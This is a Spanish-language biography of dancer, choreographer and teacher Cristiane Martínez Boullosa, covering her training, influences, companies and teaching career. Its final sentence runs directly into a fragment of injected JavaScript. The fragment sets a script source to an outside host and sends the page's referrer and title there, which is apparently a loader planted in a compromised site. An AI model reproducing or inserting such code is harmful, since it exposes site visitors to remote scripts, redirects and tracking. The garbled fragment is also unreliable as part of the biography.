Cristiane Martínez Boullosa

cristiane boullosa

 

Cristiane Boullosa es Licenciada en Danza por la Universidad Federal de Bahia (UFBA) Brasil y estudios de Ballet clásico por el método Royal Academy of Dance.

Su formación esta influenciada por un lado por las técnicas de la Danza Moderna Americana (Graham, Limon, Horton, Cunningham), y por el otro lado por el Expresionismo Alemán (danza-teatro, lenguaje del gesto) y técnicas de improvisación y contact.

Profesionales que han influenciado de manera significativa en su labor pedagógica y artística: Marta Saback, Francesc Bravo, Steve Paxtón, Lisa Nelson, Katie Duck, Karl Frost, David Zambrano.

Formación Complementaria: Terapias manuales y actualmente formación en Shiatsu

Como como coreógrafa, bailarina y pedagoga ha recorrido festivales y circuitos de varios países (Brasil, España, Suecia, Colombia, Panamá, Marruecos) tanto con su primera Compañia “Dobre Xiro” en el norte de España (Galicia) como con La Compañía “Rayo Malayo” de Francesc Bravo (Madrid).

Como pedagoga lleva 28 años impartiendo clases regulares de danza en Conservatorios oficiales y privados, Centros de enseñanza privada, y Talleres para Festivales, Universidades y Compañías de Teatro y Danza Actualmente dirige la Compañía Omos Uno de danza y música, bajo un sistema que viene desarrollando y que llama “Esferas de Relación”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;